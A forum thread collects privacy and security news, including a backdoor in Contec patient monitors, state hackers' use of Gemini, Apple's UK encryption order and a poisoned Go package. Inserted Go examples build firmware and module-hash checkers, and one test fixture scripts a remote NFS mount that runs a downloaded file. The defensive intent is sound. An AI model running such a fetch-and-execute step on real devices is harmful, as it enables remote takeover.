Privacy lost...

nsaspook

Joined Aug 27, 2009
16,330
https://www.bleepingcomputer.com/ne...hcare-patient-monitors-linked-to-ip-in-china/
Backdoor found in two healthcare patient monitors, linked to IP in China
CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, the researchers discovered anomalous network traffic to a hard-coded external IP address, which is not associated with the company but rather a university.

This led to the discovery of a backdoor in the company's firmware that would quietly download and execute files on the device, allowing for remote execution and the complete takeover of the patient monitors. It was also discovered that the device would quietly send patient data to the same hard-coded address when devices were started.

None of this activity was logged, causing the malicious activity to be conducted secretly without alerting administrators of the devices.

While CISA did not name the university and redacted the IP address, BleepingComputer has learned that it is associated with a Chinese university. Furthermore, the IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another healthcare manufacturer in China.
https://www.cisa.gov/sites/default/...t-contec-cms8000-contains-a-backdoor-508c.pdf
 

WBahn

Joined Mar 31, 2012
32,871
Loved this part:

After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.

However, each one continued to contain the malicious code, with the company simply disabling the 'eth0' network adapter to mitigate the backdoor. However, this mitigation does not help as the script specifically enables it using the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.
Translation: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.
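Added example (editor's code, not from the post, from CISA's advisory or from Contec): a small static check you could run over the scripts in an extracted firmware tree to catch exactly the failure quoted above. It flags every non-comment line that brings an interface up, mounts NFS, or embeds a hard-coded public IPv4 address, and reports the mitigation as incomplete when a script does both, which is what makes "we left eth0 down in the boot config" worthless. The two sample trees, their file names and script contents, and the address 203.0.113.7 (an RFC 5737 documentation address, not the one from the advisory) are constructed for the example.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"sort"
	"strings"
)

// Finding is one suspicious line found in a script from an extracted firmware tree.
type Finding struct {
	File string
	Line int
	Kind string // "iface-up", "nfs-mount" or "public-ip"
	Text string
}

var (
	// A script that brings an interface up by itself defeats any "fix" that only
	// leaves that interface down in the boot-time network configuration.
	ifaceUpRe  = regexp.MustCompile(`\b(ifconfig\s+\S+\s+up|ip\s+link\s+set\s+(dev\s+)?\S+\s+up)\b`)
	nfsMountRe = regexp.MustCompile(`\bmount\b.*\bnfs\b`)
	ipv4Re     = regexp.MustCompile(`\b(?:\d{1,3}\.){3}\d{1,3}\b`)
)

// isPublicIPv4 reports whether s is an IPv4 address outside the private, loopback,
// link-local, multicast and unspecified ranges, i.e. an address a monitor on a
// hospital LAN has no business contacting from a hard-coded string.
func isPublicIPv4(s string) bool {
	ip := net.ParseIP(s)
	if ip == nil || ip.To4() == nil {
		return false
	}
	return !(ip.IsPrivate() || ip.IsLoopback() || ip.IsLinkLocalUnicast() ||
		ip.IsMulticast() || ip.IsUnspecified())
}

// ScanScripts inspects script contents (path -> text) and reports every executed
// line that brings an interface up, mounts NFS, or embeds a public IPv4 address.
func ScanScripts(files map[string]string) []Finding {
	paths := make([]string, 0, len(files))
	for p := range files {
		paths = append(paths, p)
	}
	sort.Strings(paths) // deterministic report order
	var out []Finding
	for _, p := range paths {
		for i, raw := range strings.Split(files[p], "\n") {
			line := strings.TrimSpace(raw)
			if line == "" || strings.HasPrefix(line, "#") {
				continue // blank or comment: never executed
			}
			if ifaceUpRe.MatchString(line) {
				out = append(out, Finding{p, i + 1, "iface-up", line})
			}
			if nfsMountRe.MatchString(line) {
				out = append(out, Finding{p, i + 1, "nfs-mount", line})
			}
			for _, ip := range ipv4Re.FindAllString(line, -1) {
				if isPublicIPv4(ip) {
					out = append(out, Finding{p, i + 1, "public-ip", line})
					break
				}
			}
		}
	}
	return out
}

// MitigationIsIncomplete is the question to ask of a vendor's "fixed" image: does a
// script both bring an interface up and reach a hard-coded remote (NFS mount or
// public address)? If so, disabling the interface in the boot config changed nothing.
func MitigationIsIncomplete(findings []Finding) bool {
	up, remote := false, false
	for _, f := range findings {
		switch f.Kind {
		case "iface-up":
			up = true
		case "nfs-mount", "public-ip":
			remote = true
		}
	}
	return up && remote
}

// VendorFixedImage is a constructed stand-in for a "mitigated" tree: eth0 is commented
// out of the boot config, but the startup script is untouched. The address is the
// RFC 5737 documentation range, chosen for the example.
func VendorFixedImage() map[string]string {
	return map[string]string{
		"etc/network/interfaces": "auto lo\niface lo inet loopback\n#auto eth0\n#iface eth0 inet dhcp\n",
		"etc/init.d/S99monitor": "#!/bin/sh\nifconfig eth0 up\n" +
			"mount -t nfs 203.0.113.7:/export /mnt/update\n" +
			"[ -x /mnt/update/run.sh ] && /mnt/update/run.sh\n",
	}
}

// ProperFixImage is the same tree with the network calls actually removed (constructed).
func ProperFixImage() map[string]string {
	return map[string]string{
		"etc/network/interfaces": "auto lo\niface lo inet loopback\n",
		"etc/init.d/S99monitor":  "#!/bin/sh\n/usr/bin/monitor_ui &\n",
	}
}

func main() {
	for name, img := range map[string]map[string]string{"vendor-fixed": VendorFixedImage(), "proper-fix": ProperFixImage()} {
		f := ScanScripts(img)
		for _, x := range f {
			fmt.Printf("%s %s:%d [%s] %s\n", name, x.File, x.Line, x.Kind, x.Text)
		}
		fmt.Printf("%s: mitigation incomplete = %v\n", name, MitigationIsIncomplete(f))
	}
}
```

On a real image you would feed ScanScripts the files under etc/, etc/init.d/ and any rc scripts from the unpacked root filesystem; the point of the check is that it reads what the scripts do at runtime rather than what the static network configuration says.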
 

nsaspook

Joined Aug 27, 2009
16,330
Loved this part:

Translation: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.
That makes our job easier as they are the stupid ones. The default should be that any network device from China has a backdoor mandate from the CCP.
 

MrAl

Joined Jun 17, 2014
13,707
Loved this part:

Translation: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.
Everything and everyone just keeps getting stupider and stupider as time goes on. I see this so much it almost makes me sick.
We see security breaches so often with huge data banks that it makes you wonder who the heck designs this stuff.
Maybe there is something in the air :)
 

nsaspook

Joined Aug 27, 2009
16,330
Everything and everyone just keeps getting stupider and stupider as time goes on. I see this so much it almost makes me sick.
We see security breaches so often with huge data banks that it makes you wonder who the heck designs this stuff.
Maybe there is something in the air :)
This is not stupidity, this is a targeted attack vector per official CCP spying edict on all capable products sold to their people and anyone else buying those products. The only stupidity is thinking this is an isolated incident. IMO, this one was just easy to find.

https://www.techtarget.com/searchse...gle-details-adversarial-AI-activity-on-Gemini

Google identified APTs from more than 20 countries that used Gemini. Iranian actors were the heaviest Gemini users for both APT and IO threat activity, using it for a wide range of aforementioned adversarial AI activity. Chinese APTs used Gemini for reconnaissance, coding development and troubleshooting, and research on how to gain deeper access into target networks.

North Korean actors used Gemini similarly to China, though they also used it to research topics such as cryptocurrency, the South Korean military and free hosting providers. Russian use was predominantly coding assistance, though Google "observed limited use of Gemini during the period of analysis."
 

nsaspook

Joined Aug 27, 2009
16,330
https://www.theverge.com/news/608145/apple-uk-icloud-encrypted-backups-spying-snoopers-charter
Apple ordered to open encrypted user accounts globally to UK spying

The secret order would give the UK access to encrypted backups belonging to any user — not just Brits.

The UK has reportedly served Apple a document called a technical capability notice. It’s a criminal offense to even reveal that the government has made a demand. Similarly, if Apple did accede to the UK’s demands then it apparently would not be allowed to warn users that its encrypted service is no longer fully secure.
This is insanity. The genie is long out of the bottle. The attempt is an arrogant blast of a 1984-type lost cause to keep people safe.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,768
https://www.theverge.com/news/608145/apple-uk-icloud-encrypted-backups-spying-snoopers-charter
Apple ordered to open encrypted user accounts globally to UK spying

This is insanity. The genie is long out of the bottle. The attempt is an arrogant blast of a 1984-type lost cause to keep people safe.
That would be the dream scenario of all governments on the planet. Complete and unrestricted access to people's private lives under the excuse of national safety.

This will be a never ending struggle between private citizens and people in power. And the citizens must never yield. Otherwise the way back to privacy, peace and tranquility will become almost impossible.
 

nsaspook

Joined Aug 27, 2009
16,330
https://www.theregister.com/2025/02/04/golang_supply_chain_attack/

Poisoned Go programming language package lay undetected for 3 years
Regardless, Boychenko says the way in which the creator exploited Go's package system highlights a flaw that requires greater understanding among developers.

The original boltdb-go package was published to GitHub. When it is first requested, the Go Module Mirror service caches the package and makes it available indefinitely.

The malicious project author then modified the project's Git tags to point to the legitimate version (boltdb) so that a manual review of boltdb-go wouldn't reveal any signs of foul play, all while the malicious version was still being served to unsuspecting developers.
Proxy cache attack, that's a good one.
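Added example (editor's code, not from the post, The Register's article or the Go project): how the Go Module Mirror's cache and a repository's git tags can disagree without anyone noticing, and the check that exposes it. go.sum pins each module version to an `h1:` hash that the go command computes over the module zip it was actually served; the function below reimplements that hash with the standard library (sha256 of "hash  path" lines, paths sorted, base64-encoded, the dirhash.Hash1 construction) so the go.sum line can be compared against a fresh checkout of the repository tag. If the two differ, the code the proxy is serving is not the code the tag now points at. The module path example.com/kvstore, its version and file contents are constructed for the example.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"sort"
)

// ModuleHash computes the "h1:" hash go.sum records for a module version: for each
// file, sorted by path, a line "<sha256 hex>  <path>\n" is fed into one sha256, and
// the digest is base64-encoded. Paths are the module zip entry names
// "<module>@<version>/<file>", exactly as the go command hashes them.
func ModuleHash(files map[string][]byte) string {
	paths := make([]string, 0, len(files))
	for p := range files {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	h := sha256.New()
	for _, p := range paths {
		sum := sha256.Sum256(files[p])
		fmt.Fprintf(h, "%x  %s\n", sum[:], p)
	}
	return "h1:" + base64.StdEncoding.EncodeToString(h.Sum(nil))
}

// Verify compares a set of module files against a go.sum hash. Run against the
// module cache it is what `go mod verify` does; run against a checkout of the repo
// tag it answers the question the proxy never asks: is the tag still this code?
func Verify(goSumHash string, files map[string][]byte) bool {
	return ModuleHash(files) == goSumHash
}

// ServedModule is a constructed module version as a proxy could have cached it on
// first request; the extra file and the callHome hook are invented for the example.
func ServedModule() map[string][]byte {
	return map[string][]byte{
		"example.com/kvstore@v1.2.0/go.mod":    []byte("module example.com/kvstore\n\ngo 1.21\n"),
		"example.com/kvstore@v1.2.0/db.go":     []byte("package kvstore\n\nfunc Open(path string) (*DB, error) { callHome(); return open(path) }\n"),
		"example.com/kvstore@v1.2.0/hidden.go": []byte("package kvstore\n\nfunc callHome() { /* constructed stand-in */ }\n"),
	}
}

// RetaggedModule is what a reviewer sees after the author moved the tag: same
// version string, clean Open, no hidden file (constructed).
func RetaggedModule() map[string][]byte {
	return map[string][]byte{
		"example.com/kvstore@v1.2.0/go.mod": []byte("module example.com/kvstore\n\ngo 1.21\n"),
		"example.com/kvstore@v1.2.0/db.go":  []byte("package kvstore\n\nfunc Open(path string) (*DB, error) { return open(path) }\n"),
	}
}

func main() {
	// The hash go.sum pinned when the module was first fetched through the proxy.
	pinned := ModuleHash(ServedModule())
	fmt.Println("go.sum:   example.com/kvstore v1.2.0", pinned)
	fmt.Println("repo tag: example.com/kvstore v1.2.0", ModuleHash(RetaggedModule()))
	fmt.Println("cache matches go.sum:", Verify(pinned, ServedModule()))
	fmt.Println("repo tag matches go.sum:", Verify(pinned, RetaggedModule()))
}
```

Note what this shows about the existing tooling: `go mod verify` passes, because the module cache and go.sum both came from the proxy and agree with each other. Catching the retagging needs the extra step of hashing the repository checkout (or diffing it against the zip that `go mod download -json` reports in its Zip field) and comparing with the go.sum line.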
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,768
Not sure if this subject belongs in this thread, but it's definitely worth giving it some thought and consideration. I hope Amazon gets hacked the hell out for this extremely unfair and abusive practice:

Amazon is quietly removing the ability to download your Kindle books to your computer starting February 26. After that, your entire digital library will be locked within their ecosystem, with no way to back it up.

 

MrAl

Joined Jun 17, 2014
13,707
Not sure if this subject belongs in this thread, but it's definitely worth giving it some thought and consideration. I hope Amazon gets the hell hacked out for this extremely unfair and abusive practice:

Amazon is quietly removing the ability to download your Kindle books to your computer starting February 26. After that, your entire digital library will be locked within their ecosystem, with no way to back it up.

That's one of the problems with 'online' things. There are no laws protecting the consumer.
The standard practice today is to get consumers 'hooked' onto a free product, then once enough members are using it, they change something that means the consumer pays in one way or another. That's what clearly pisses people off.
Think about what they did with Amazon Prime Video, all of a sudden there are commercials unless you pay extra now.
Imagine how many people that were using Amazon Prime Video who got the surprise one day.
 

nsaspook

Joined Aug 27, 2009
16,330
https://9to5mac.com/2025/02/21/apple-removing-end-to-encryption-uk/
Apple is removing iCloud end-to-end encryption features from the UK after government compelled it to add backdoors

For UK users with Advanced Data Protection currently active, Apple warns they will soon have to disable this feature to keep being able to use their iCloud account. Because of the end-to-end nature of the system, Apple cannot automatically do this. Apple will be releasing additional documentation soon to lay out the migration path for these customers.
 